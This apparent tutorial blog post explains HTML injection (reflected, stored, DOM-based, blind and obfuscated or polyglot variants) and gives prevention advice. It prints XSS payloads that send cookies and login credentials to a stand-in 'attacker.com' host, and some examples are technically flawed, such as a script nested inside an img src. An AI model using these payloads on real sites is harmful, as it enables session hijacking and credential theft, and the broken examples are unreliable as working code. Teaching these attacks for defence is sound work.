HTML Injection: What is this vulnerability ?

7 min readJun 21, 2023

What is HTML Injection?

HTML injection is a type of attack where an attacker exploits vulnerabilities in a website by injecting HTML code. The intention is to manipulate the website’s design or alter the information displayed to users. The attacker sends HTML code through vulnerable fields, which can result in the user seeing the injected data. Essentially, HTML injection involves injecting markup language code into a web page’s document.

The data sent during this type of attack can vary. It could be a few HTML tags that display the injected information or even a complete fake form or page. When this attack occurs, the browser often treats the malicious data as legitimate and renders it accordingly.

It’s important to note that the risks of HTML injection go beyond changing a website’s appearance. This type of attack is similar to cross-site scripting (XSS), where an attacker can steal someone else’s identity. Therefore, identity theft can also occur as a consequence of HTML injection.

Types of HTML Injection

The attack itself may appear straightforward due to the simplicity of HTML, but there are various methods and types of HTML injection attacks. These attacks can be classified based on the risks they pose. Here are some common types:

Reflected HTML Injection
Stored HTML Injection
DOM-based HTML Injection
Blind HTML Injection
Advanced HTML Injection Techniques

Reflected HTML Injection

In this type, the injected HTML code is reflected back to the user without being stored permanently on the server. It typically occurs through URL parameters or form inputs that are directly echoed back in the response. The risk lies in tricking users into executing malicious code or revealing sensitive information.

Here are a few examples of payloads used in Reflected HTML Injection attacks:

http://www.example.com/search?query=<html><script>alert('Vulnerable to HTML Injection!');</script></html>

In this example, the payload is injected into the “query” parameter of the search page URL. When the user performs the search, the injected code is reflected back in the response, resulting in a pop-up alert displaying the message “Vulnerable to HTML Injection!”.

Stored HTML Injection

Also known as persistent HTML injection, this attack involves injecting HTML code that is stored permanently on the server. The injected code is then displayed to multiple users when they access the affected page. It can lead to widespread exploitation and impact the reputation of the website.

The payload for a stored HTML injection typically consists of malicious HTML or JavaScript code that is embedded within user-generated content, such as comments, forum posts, or user profiles. When the vulnerable page retrieves and displays this content, the injected code is executed in the context of the victim’s browser, potentially leading to various malicious activities.

Here’s an example payload for a stored HTML injection:

<script>
  // Malicious code to steal user cookies
  const attackerUrl = 'http://attacker.com/collect.php';
  const img = new Image();
  img.src = `${attackerUrl}?cookie=${document.cookie}`;
</script>

In this payload, an attacker embeds a script tag within user-generated content. The script creates a new image element and sets its source to an attacker-controlled URL. The script then appends the user’s cookies as a parameter in the URL. When the page loads and renders the user-generated content, the image’s source is fetched, effectively sending the victim’s cookies to the attacker’s server. The attacker can then use these stolen cookies to impersonate the victim or perform other malicious actions.

This is just one example of a payload; the actual payload can vary based on the attacker’s objectives. The impact of a successful stored HTML injection attack can include session hijacking, defacement of web pages, stealing sensitive user information, spreading malware, or launching phishing attacks.

Preventing stored HTML injection requires implementing proper input validation and output encoding techniques. Web developers should sanitize user-generated content and validate it against a whitelist of allowed characters and HTML tags. Additionally, output encoding should be used when displaying user-generated content to ensure that any special characters are properly encoded and rendered as plain text rather than interpreted as HTML or JavaScript.

DOM-based HTML Injection

DOM (Document Object Model) is a programming interface for HTML and XML documents. In this type of attack, the injected code manipulates the DOM dynamically within the user’s browser, altering the webpage’s structure and behaviour. It can lead to various consequences such as unauthorized actions or data leakage.

Here’s an example payload for a DOM-based HTML injection:

// Assuming there is a vulnerable input field with the id 'message'
const userInput = document.getElementById('message').value;

// Attacker-controlled input causing DOM-based XSS
const payload = '<img src="http://attacker.com/steal?cookie=' + document.cookie + '">';

// Dynamically update the DOM with the user input
document.getElementById('output').innerHTML = userInput;

// Append the payload to the DOM
document.getElementById('output').innerHTML += payload;

In this payload example, there is an input field with the id ‘message’, which is vulnerable to DOM-based HTML. The attacker-controlled payload consists of an image tag that points to an attacker-controlled URL. It appends the victim’s cookie as a parameter in the URL. The payload is then added to the DOM by updating the innerHTMLof an element with the id ‘output’.

When a user interacts with the vulnerable input field and submits the form or triggers a specific event, the payload is executed within the victim’s browser. The image is loaded from the attacker’s server, which collects the victim’s cookie information, enabling the attacker to potentially perform session hijacking or other malicious activities.

Preventing DOM-based HTML injection requires a combination of secure coding practices and input validation.

Input validation: Validate and sanitize any user input before using it in DOM manipulation to ensure it does not contain malicious code or unexpected characters.
Contextual output encoding: When dynamically adding user input to the DOM, use appropriate encoding mechanisms based on the context. For example, use textContentinstead of innerHTMLto insert plain text or sanitize user input using a library that escapes HTML characters.
Strict Content Security Policy (CSP): Implement a strict CSP that restricts the execution of inline scripts and limits the sources from which scripts can be loaded, reducing the risk of code injection.
Regular security updates: Keep web browsers and client-side libraries up to date to benefit from the latest security patches and protections against DOM-based HTML.

Blind HTML Injection

This type of attack is characterized by the absence of immediate feedback or visible effects of the injected code. The attacker doesn’t directly observe the results but expects them to affect other users or the system itself.

The payload for blind HTML injection typically aims to exploit the vulnerable application by injecting code that sends data to the attacker’s controlled server or performs other actions that are not immediately visible to the attacker. Here’s an example payload for blind HTML injection:

<img src="http://attacker.com/collect.php?data=<script>
  // Malicious code to steal user credentials
  const victimForm = document.getElementById('loginForm');
  const username = victimForm.username.value;
  const password = victimForm.password.value;

  // Send stolen credentials to the attacker's server
  const xhr = new XMLHttpRequest();
  xhr.open('GET', 'http://attacker.com/steal?username=' + encodeURIComponent(username) + '&password=' + encodeURIComponent(password));
  xhr.send();
</script>">

In this example, the payload is injected within an image tag’s source attribute. The injected code targets a login form with HTML elements having ‘username’ and ‘password’ IDs. When the vulnerable page loads and renders the injected image, the JavaScript code within the payload is executed in the victim’s browser context. It steals the username and password values from the login form and sends them as parameters in a GET request to the attacker’s controlled server.

The attacker’s server can collect the stolen credentials for further exploitation or unauthorized access to user accounts. Since the attacker cannot directly observe the results, they might rely on other techniques to confirm the successful execution of the payload, such as checking server logs or attempting to use the stolen credentials.

Advanced HTML Injection Techniques

Attackers may employ advanced techniques to evade detection or enhance the impact of their HTML injection attacks. This can include obfuscating the injected code, leveraging specific vulnerabilities in web application frameworks, or combining HTML injection with other attack vectors, such as cross-site scripting (XSS) or SQL injection.

Obfuscated Payloads

Attackers can obfuscate their injected code to make it harder to detect and bypass security controls. They may use techniques like character encoding, string concatenation, and code obfuscation tools to obfuscate the payload. For example:

var payload = "&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;alert(&#x22;XSS&#x22;);&#x3c;/&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;";
document.getElementById("output").innerHTML = unescape(payload);

Polyglot Payloads

Polyglot payloads are malicious code that can be interpreted as multiple languages or file types. Attackers use them to exploit vulnerabilities in different components of a web application. For example, a payload that can be interpreted as both HTML and JavaScript:

<script>
    var payload = '<img src="x" onerror="javascript:alert(\'XSS\')">';
    document.getElementById("output").innerHTML = payload;
</script>

Framework-Specific Exploits

Attackers may leverage specific vulnerabilities or weaknesses in popular web application frameworks to perform HTML injection attacks. This can include exploiting template injection vulnerabilities, misusing template engines, or manipulating server-side rendering processes. These techniques require in-depth knowledge of the targeted framework.

HTML Injection with XSS

Attackers may combine HTML injection with cross-site scripting (XSS) techniques to enhance their attacks. They inject malicious code that, when executed, triggers an XSS vulnerability in the target application. This allows them to execute arbitrary JavaScript code and perform various malicious actions. For example:

<img src="x" onload="javascript:alert(document.cookie)">

HTML Injection with SQL Injection

In some cases, attackers may combine HTML injection with SQL injection to perform more advanced attacks. They may inject malicious code that manipulates the underlying database or executes arbitrary SQL queries. This technique can result in data exfiltration, unauthorized access, or further exploitation of the application’s vulnerabilities.

It’s important for developers and security professionals to stay up-to-date with the latest attack techniques and regularly test web applications for vulnerabilities. Employing secure coding practices, input validation, output encoding, and security testing can help mitigate the risk of advanced HTML injection attacks.

Thanks for reading, I hope you have understood what HTML Injection is and how it can cause damage.